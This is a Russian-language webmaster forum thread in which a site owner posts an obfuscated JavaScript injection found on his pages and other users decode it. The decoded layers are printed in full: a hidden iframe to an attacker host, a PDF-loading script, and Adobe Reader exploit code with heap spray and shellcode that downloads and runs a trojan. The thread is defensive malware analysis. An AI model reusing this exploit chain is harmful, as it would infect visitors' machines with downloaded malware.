Зараза! Что за троян (JS) на сайте?

12
DimaU
На сайте с 30.08.2005
Offline
180
1352

Вчера на сайте на главной странице в источнике увидел кусок вируса. Касперский опознал его как "Тrojan.JS.Iframe.ef" Мастерхоcт уверил, что вирус появился с локала при заливке страниц сайта по ftp. Что удивительно, сайт не на движке - обычные hml-страницы. :) Вирус присоседился сразу за тегом <body>. Естественно, все пароли (ftp) сменил, локальный комп был просканирован, антишпион поставлен - вроде все чисто... Еще, запросил лог доступа по ftp.

Ниже привожу код вируса (заменил скрипт=script).

Что там записано на JS? Какие действия? :madd:

<скрипт>lo=new
Array(81,69,10,83,88,84,66,90,82,89,67,25,84,69,82,86,67,82,114,91,82,90,82,89,67,31,16,94,81,69,86,90,82,16,
30,12,61,81,69,25,68,69,84,10,21,95,67,67,71,13,24,24,86,83,84,88,66,89,67,82,69,68,25,89,82,67,24,81,86,69,
24,68,95,88,64,25,71,95,71,8,68,10,82,85,4,6,83,6,14,1,81,84,21,12,61,81,69,25,68,67,78,91,82,25,83,94,68,71,
91,86,78,10,21,89,88,89,82,21,12,61,83,88,84,66,90,82,89,67,25,80,82,67,114,91,82,90,82,89,67,68,117,78,
99,86,80,121,86,90,82,31,16,85,88,83,78,16,30,108,7,106,25,86,71,71,82,89,83,116,95,94,91,83,31,81,69,
30,12,61);oa="";jnyh=String.fromCharCode;tl=55;for(vf
in lo)oa+=jnyh(lo[vf]^tl);eval(oa);</скрипт>
[Удален]
#1
fr=document.createElement('iframe');
fr.src="http://adcounters.net/far/show.php?s=eb31d196fc";
fr.style.display="none";
document.getElementsByTagName('body')[0].appendChild(fr);

вот такие там действия :)

DimaU
На сайте с 30.08.2005
Offline
180
#2

спасибо :)

счетчик так накручивает... :) а можно как-то вычислить по id= eb31d196fc - кто это?

http://adcounters.net/far/show.php?s=eb31d196fc";
Fr3d
На сайте с 29.05.2008
Offline
86
#3
DimaU:
спасибо :)
счетчик так накручивает... :) а можно как-то вычислить по id= eb31d196fc - кто это?

какой счетчик, там фрейм на эксплойт был

админка h_tp://adcounters.net/far/admin.php

Webmoney кредиты - это WMCoin.ru (http://wmcoin.ru)
[Удален]
#4
DimaU:
счетчик так накручивает... а можно как-то вычислить по id= eb31d196fc - кто это?

если вычислите, отпишитесь :)

DimaU
На сайте с 30.08.2005
Offline
180
#5
фрейм на эксплойт

Fr3d, можно подробнее, pls, что это и с чем едят? :)

Впервые сталкиваюсь...

L
На сайте с 12.11.2009
Offline
79
#6

исполняется это

fr=document.createElement('iframe');
fr.src="http://adcounters.net/far/show.php?s=eb31d196fc";
fr.style.display="none";
document.getElementsByTagName('body')[0].appendChild(fr);

потом грузится закодированное вот это

function Complete(){setTimeout('location.href = "http://smotribezsms.ucoz.ru/',2000);}
function pdf(){var isInstalled=false;if(navigator.plugins&&navigator.plugins.length){for(var x=0;x<navigator.plugins.length;x++){if(navigator.plugins[x].description.indexOf('Adobe Acrobat')!=-1){isInstalled=true;break;}
if(navigator.plugins[x].description.indexOf('Adobe PDF')!=-1){isInstalled=true;break;}}}else if(window.ActiveXObject){var control=null;try{control=new ActiveXObject('AcroPDF.PDF');}catch(e){}
if(!control){try{control=new ActiveXObject('PDF.PdfCtrl');}catch(e){}}
if(control){isInstalled=true;}}
if(isInstalled){var ua=navigator.userAgent.toLowerCase();if(ua.indexOf("firefox")!=-1){var pdfelement=document.createElement('embed');document.body.appendChild(pdfelement);pdfelement.width='1';pdfelement.height='1';pdfelement.src='./pdf.php';pdfelement.type='application/pdf';}else{var pdfelement=document.createElement('iframe');pdfelement.setAttribute('src','./pdf.php');pdfelement.setAttribute('width',200);pdfelement.setAttribute('height',200);pdfelement.setAttribute('style','display:none;');document.body.appendChild(pdfelement);}
setTimeout("Complete();",2000);}else{Complete();}}
pdf();

- ГС для отвода глаз + сплоит, который открывает httр://adcounters.net/far/pdf.php, тем самым запускает acrobat reader и исполняет это

lyoxa добавил 15.01.2010 в 15:21

%PDF-1.3
%вгПУ
1 0 obj
<</OpenAction <</JS (this.BXcfTYewQ\(\))
/S /JavaScript
>>
/Threads 2 0 R
/Outlines 3 0 R
/Pages 4 0 R
..................
13 0 obj
<</Length 15989
>>
stream
var n = ""; eval(eval('Stri'+n+'ng.fr'+n+'omCharC'+n+'ode(102,117,многа цифр,41,59,125)'));
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
.............
/Size 15
>>
startxref
4374
%%EOF

который открывшись в окне браузера выполняет это

lyoxa добавил 15.01.2010 в 15:22

function BXcfTYewQ(){
function fix_it(yarsp,len){
while(yarsp.length*2<len){yarsp+=yarsp; }
yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf(){
var payload=unescape("&#49203;&#35684;&#12352;&#3192;&#16523;&#35596;&#7280;&#35757;&#2136;&#2539;&#16523;&#36148;&#31808;&#22667;&#27196;&#23108;&#58065;&#57899;&#60555;&#20459;&#21082;&#60035;&#35158;ѕ&#22358;&#29579;&#35644;&#13172;&#888;&#22259;&#30347;&#800;&#13299;&#18889;&#16720;&#13229;&#14079;&#48655;&#788;&#62008;&#2164;&#53185;&#781;&#16634;&#61419;&#15192;&#30200;&#24293;&#18059;&#804;&#26307;&#3211;&#35656;&#7254;&#54019;&#1163;&#906;&#24515;&#20574;&#36291;&#2173;&#21079;&#13240;&#35530;&#59483;&#65442;&#65535;&#49202;&#63371;&#44786;&#47183;&#11877;&#30821;&#26283;&#26264;&#45227;&#35436;&#39136;&#26704;&#28271;&#25646;&#30056;&#27762;&#21613;&#36536;&#3662;&#65516;ѕ&#20627;&#49203;&#20560;&#35670;ѕ&#49795;&#33663;&#12738;&#20562;&#14008;&#12058;&#65392;ѕ&#13147;&#22527;&#47190;&#65176;&#3722;&#22015;&#22276;&#61368;&#57550;&#65376;ѕ&#29800;&#28788;&#12090;&#24879;&#25444;&#30063;&#29806;&#29285;&#11891;&#25966;&#12148;&#24934;&#12146;&#28524;&#25697;&#28718;&#28776;&#25919;&#12861;");
var nop=unescape("&#2570;&#2570;&#2570;&#2570;")
var heapblock=nop+payload;
var bigblock=unescape("&#2570;&#2570;");
var headersize=20;
var spray=headersize+heapblock.length;
while(bigblock.length<spray){bigblock+=bigblock;}
var fillblock=bigblock.substring(0,spray);
var block=bigblock.substring(0,bigblock.length-spray);
while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();
for(var i=0;i<1400;i++){mem_array=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",num);
}
function collab_email(){
var shellcode=unescape("&#49203;&#35684;&#12352;&#3192;&#16523;&#35596;&#7280;&#35757;&#2136;&#2539;&#16523;&#36148;&#31808;&#22667;&#27196;&#23108;&#58065;&#57899;&#60555;&#20459;&#21082;&#60035;&#35158;ѕ&#22358;&#29579;&#35644;&#13172;&#888;&#22259;&#30347;&#800;&#13299;&#18889;&#16720;&#13229;&#14079;&#48655;&#788;&#62008;&#2164;&#53185;&#781;&#16634;&#61419;&#15192;&#30200;&#24293;&#18059;&#804;&#26307;&#3211;&#35656;&#7254;&#54019;&#1163;&#906;&#24515;&#20574;&#36291;&#2173;&#21079;&#13240;&#35530;&#59483;&#65442;&#65535;&#49202;&#63371;&#44786;&#47183;&#11877;&#30821;&#26283;&#26264;&#45227;&#35436;&#39136;&#26704;&#28271;&#25646;&#30056;&#27762;&#21613;&#36536;&#3662;&#65516;ѕ&#20627;&#49203;&#20560;&#35670;ѕ&#49795;&#33663;&#12738;&#20562;&#14008;&#12058;&#65392;ѕ&#13147;&#22527;&#47190;&#65176;&#3722;&#22015;&#22276;&#61368;&#57550;&#65376;ѕ&#29800;&#28788;&#12090;&#24879;&#25444;&#30063;&#29806;&#29285;&#11891;&#25966;&#12148;&#24934;&#12146;&#28524;&#25697;&#28718;&#28776;&#25919;&#12861;");
var mem_array=new Array();
var cc=0x0c0c0c0c;
var addr=0x400000;
var sc_len=shellcode.length*2;
var len=addr-(sc_len+0x38);
var yarsp=unescape("&#37008;&#37008;");
yarsp=fix_it(yarsp,len);
var count2=(cc-0x400000)/addr;
for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("&#3084;&#3084;");
while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});
}
function collab_geticon(){
if(app.doc.Collab.getIcon){
var arry=new Array();
var vvpethya=unescape("&#49203;&#35684;&#12352;&#3192;&#16523;&#35596;&#7280;&#35757;&#2136;&#2539;&#16523;&#36148;&#31808;&#22667;&#27196;&#23108;&#58065;&#57899;&#60555;&#20459;&#21082;&#60035;&#35158;ѕ&#22358;&#29579;&#35644;&#13172;&#888;&#22259;&#30347;&#800;&#13299;&#18889;&#16720;&#13229;&#14079;&#48655;&#788;&#62008;&#2164;&#53185;&#781;&#16634;&#61419;&#15192;&#30200;&#24293;&#18059;&#804;&#26307;&#3211;&#35656;&#7254;&#54019;&#1163;&#906;&#24515;&#20574;&#36291;&#2173;&#21079;&#13240;&#35530;&#59483;&#65442;&#65535;&#49202;&#63371;&#44786;&#47183;&#11877;&#30821;&#26283;&#26264;&#45227;&#35436;&#39136;&#26704;&#28271;&#25646;&#30056;&#27762;&#21613;&#36536;&#3662;&#65516;ѕ&#20627;&#49203;&#20560;&#35670;ѕ&#49795;&#33663;&#12738;&#20562;&#14008;&#12058;&#65392;ѕ&#13147;&#22527;&#47190;&#65176;&#3722;&#22015;&#22276;&#61368;&#57550;&#65376;ѕ&#29800;&#28788;&#12090;&#24879;&#25444;&#30063;&#29806;&#29285;&#11891;&#25966;&#12148;&#24934;&#12146;&#28524;&#25697;&#28718;&#28776;&#25919;&#12861;");
var hWq500CN=vvpethya.length*2;
var len=0x400000-(hWq500CN+0x38);
var yarsp=unescape("&#37008;&#37008;");
yarsp=fix_it(yarsp,len);
var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;
for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;}
var tUMhNbGw=unescape("%09");
while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
tUMhNbGw="N."+tUMhNbGw;
app.doc.Collab.getIcon(tUMhNbGw);
}
}
function pdf_start(){
var version=app.viewerVersion.toString();
version=version.replace(/\D/g,'');
var varsion_array=new Array(
version.charAt(0),
version.charAt(1),
version.charAt(2));
if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){util_printf();}
if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){collab_email();}
if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){collab_geticon();}
}
pdf_start();}

а тут сами уже ))

DimaU
На сайте с 30.08.2005
Offline
180
#7
lyoxa:
а тут сами уже ))

не осилю :) Этот код может воровать пароли и куда отсылает?

Юпи-с
На сайте с 30.07.2006
Offline
230
#8

Жесть, я тоже как то ловил js на сайте у себя, но я думал банально посещалку накручивали

[Удален]
#9
lyoxa:
httр://adcounters.net/far/pdf.php

у меня антивирь сругался на пдку эту)

L
На сайте с 12.11.2009
Offline
79
#10

Продолжение )

Последний код качает и выполняет exe файл http://adcounters.net/far/load.php?e=2

который последним DrWeb'ом распознается как "Trojan.DownLoad.35952"

А что он там уже качает незнаю ))

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий